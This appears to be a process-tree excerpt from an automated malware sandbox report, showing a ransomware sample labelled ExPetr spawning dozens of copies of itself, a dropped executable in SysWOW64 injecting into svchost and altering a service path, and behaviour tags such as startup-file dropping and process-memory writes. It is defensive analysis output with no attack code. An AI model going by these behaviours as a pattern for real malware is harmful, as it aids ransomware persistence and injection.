C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5348
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3308
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6204
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6424
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5144
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5240
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7436
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7832
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6680
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5904
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7260
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6976
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7532
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7608
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7756
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5316
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7204
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6956
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4460
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6944
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:8052
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6892
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7396
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6952
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5976
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7256
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:8072
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:8044
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:2108
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7240
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3800
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7752
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7404
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:8188
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7984
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7996
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7772
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7924
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3660
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7408
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7136
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5148
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7196
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5888
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7216
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7192
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6352
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:1688
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6296
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7276
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6368
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7000
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:2996
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6552
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7740
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7280
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7312
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5988
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6036
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7160
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7156
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7304
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:3860
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7344
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:7128
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5156
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6388
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2556
-
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵PID:6876
-
C:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exeC:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exe /d"C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3956 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Sets service image path in registry
- System Location Discovery: System Language Discovery
PID:6848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 5242⤵
- Program crash
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4652 -ip 46521⤵PID:6668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3956 -ip 39561⤵PID:6988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6236 -ip 62361⤵PID:5472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6236 -ip 62361⤵PID:6184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:4452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4664 -ip 46641⤵PID:8116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6236 -ip 62361⤵PID:7048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:2868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:6352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7164 -ip 71641⤵PID:5440
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
